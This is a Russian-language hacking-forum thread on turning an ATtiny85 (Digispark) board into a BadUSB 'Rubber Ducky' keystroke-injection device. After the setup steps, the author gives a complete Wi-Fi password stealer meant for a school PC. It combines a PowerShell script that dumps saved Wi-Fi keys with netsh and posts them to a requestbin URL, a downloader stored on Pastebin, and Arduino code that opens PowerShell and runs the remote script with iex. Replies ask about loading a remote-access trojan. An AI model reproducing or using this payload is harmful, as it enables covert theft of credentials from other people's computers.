Настройка attiny85 | BadUSB | RUBBER DUCKY

[Danij]

Всем привет.​

Тут на днях приехала attiny85. Покупалась с целью создания чего-то типа RUBBER DUCKY.
Решил разбираться сам, и делиться с Вами.

Спойлер: Предисловие

Разница в ценах конечно заметна.

Сразу решил разбираться, что можно натворить с помощью данной штучки. Пришел к выводу, что если есть лишние деньги, то шняга за 50$ от ребят из hak5gear будет намного функциональнее. Однако выжать свое можно и из attiny85.

Начать думаю стоит с установки нужных приложеничек на наш Пека.

Спойлер: Приложенички

Пункт 0 - установка дров. Скачали, поставили.
Первое, что нам нужно - Arduino ide (первая кнопка там Windows Installer). Скачали, установили.
Дальше заходим в "Файл - Настойки"

Спойлер: Картинка

Там видим такую тему

Спойлер: Большая картиночка

Вставляем туда ссыль: http://digistump.com/package_digistump_index.json
Далее топаем в "Менеджер плат"

Спойлер: Картинка

Туда вставляем это: Digistump AVR Boards, жмем More info и жмем "Install" (на скрине уже установлено). Дожидаемся конца установки.

Спойлер: Картинка (неожиданно, да?)

Далее снова топаем в Настройки, находим там пункт "Другие настойки можно редактировать непосредственно в файле" и жмем по пути. В открывшийся путь дописываем "\packages\digistump\hardware\avr\1.6.7\libraries\DigisparkKeyboard". Находим там файл DigiKeyboard.h и открываем его блокнотом.
Дописываем туда, где коды клавиш это:

Спойлер: Код

#define KEY_ENTER 40
#define KEY_SPACE 44
#define KEY_SINGLEQ 49
#define KEY_COLON 55
#define KEY_HYPHEN 56
#define KEY_DELETE 76

Сейвим, закрываем. В самой ардуине снова находим платы, и выбираем там Digispark (Default – 16.6 mhz).
Считайте, что программу мы настроили.

Первое, что решил сделать - возможность пиздить пароли от Wi-Fi с компьютера.

Спойлер: Wi-Fi stealer

Ориентировано под Windows офк, т.к. целью является ПК на учебе.
Часть кода взята отсюда (не реклама). Все шикарно сделано и расписано, но не работает. Точнее работает все, если делать вручную. Если же грузить целиком код с гитхаба, как предлагают там - ничерта он не работает. Похоже на защиту, что логично.

Спойлер: Инструкция

Идем на реквестбин. Делаем новую "корзинку".

Копируем ее ссылку (не из адресной строки с ?inspect, а ту, что будет посередине экрана). Копируем желательно в блокнот, ибо потеряется.
Идем на pastebin. ОБЯЗАТЕЛЬНО регаемся (через что угодно, хоть гугл).
Делаем новую пасту

И вставляем туда код:

Спойлер: Код

$wifi_ru=(netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Содержимое ключа\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ ESSID=$name;PASS=$pass }} | Format-Table -AutoSize
$wifi_en=(netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)}  | Select-String "key\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ ESSID=$name;PASS=$pass }} | Format-Table -AutoSize
$url="https://requestb.in/zz0nzqzz"
$wifi_ru
$wifi_ru | Out-File tmp.txt
$data=Get-Content .\tmp.txt
$data
Invoke-RestMethod -Method Post -Uri $url -Body $data
Remove-Item -Path shellcode.txt
Set-Clipboard -Value "Your computer was fucked up!"
clear
exit

Вставили? Сохраняйте. Сохранили? Молодцы. Тыкаем вот сюда

и копируем ссылку на то, что открылось. Ее тоже в блокнот.
Дальше делаем вторую пасту. В нее пишем это:

Спойлер: Код2

$source = "ВАША ССЫЛКА НА ПАСТУ"
$destination = "shellcode.txt"
$web = New-Object System.Net.WebClient
$web.DownloadFile($source, $destination)
$file = Get-Content -Path $destination -Encoding UTF8
Set-Clipboard -Value $file

Надеюсь то, что вместо ВАША ССЫЛКА НА ПАСТУ нужно вставить ту ссыль, которая в блокноте вторая, да?

В этой пасте тоже нужно нажать на RAW, и ссыль в блокнот скопировать.
Так, вроде как все. Дальше открываем ардуино, и копируем туда код:

Спойлер: Снова код

#include "DigiKeyboard.h"

void setup() {
  DigiKeyboard.update();
}

void loop() {
  delay(1000);
  DigiKeyboard.update();
  delay(100);

   // meta+r, delete content, start powershell
  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); // meta+r
  delay(100);
  DigiKeyboard.sendKeyStroke(KEY_DELETE); // Clean it up
  delay(50);
  DigiKeyboard.println("powershell");
  delay(200);
  DigiKeyboard.println("iex (New-Object Net.WebClient).DownloadString(\"ССЫЛКА НА ВТОРУЮ ПАСТУ\")");
  delay(3000);
  DigiKeyboard.sendKeyStroke(KEY_V, MOD_CONTROL_LEFT);
  delay(50);
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  delay(900000);
}

Да, вместо ССЫЛКА НА ВТОРУЮ ПАСТУ пишем сслыку на последнюю созданную пасту.

Seems like это все. Нажимаем сюда вот

и следим за консолью внизу. Как появится надпись со скрина ниже - пихаем attiny85 в порт USB.

Если вылезло это - молодцы, все сделали верно. Если нет - попробуйте еще раз.

P.S. Вставляя в ПК эту штуку, чекайте расскладку клавиатуры. Работает на английской только, думаю тут ясно. А все пароли от ВиФи будут отправляться на ту реквестбин, которую вы сделали. Открываете главную страницу реквестбин, и там будут справа ваши корзинки. Тыкаете на нужную и юзаете. Ну либо берете ссыль из блокнота, и добавляете в ее конец ?inspect

На этом думаю, можно закончить. Все под спойлерами потому, что планирую разбираться и писать статьи дальше. Если кто-то докинет материала по теме - буду благодарен. Надеюсь, я увижу Ваш актив, потому, что я писал это все ровно час.
Разноцветный гейский цвет статьи, хех. Но красиво же, да?

 

[Danij]

Видяшка работы скрипта, который ворует пароли Wi-Fi.
На все про все уходит примерно секунд 20, вполне неплохой результат, думаю (видео пишется с момента, как вставил в порт attiny).

 

[Artem813813]

Спасиб за личный

 

[Tough]

Уже спрашивал в подобной теме, ответов не получил.
1.батников, exeшников не нужно запускать ну машине? Вроде авторана?
2.Сохраняется все на флешку или отправляется на сервер?
3. Можно ли залить ратник, а не только стиллер?

 

[Danij]

1.батников, exeшников не нужно запускать ну машине? Вроде авторана?

Читай тему

2.Сохраняется все на флешку или отправляется на сервер?

Читай тему(2), там вообще флешки нет и близко, какая флешка

3. Можно ли залить ратник, а не только стиллер?

Где там написано, что на машину заливается стиллер?

 

[Tough]

Читай тему

Читай тему(2), там вообще флешки нет и близко, какая флешка

Где там написано, что на машину заливается стиллер?

Я уже вкурил как СОЗДАТЬ подобие Rubber Duck/ Меня интересуют именно те вопросы что я озвучил. Кто-то работал с этим HID (на Arduino), вот интересуюсь принципом. Не просто же вставил и ушел. Куда логи сыпятся?

 

[Danij]

Куда логи сыпятся?

А все пароли от ВиФи будут отправляться на ту реквестбин, которую вы сделали.

:Dntknw:Dntknw:Dntknw

 

[Tough]

:Dntknw:Dntknw:Dntknw

Благодарю!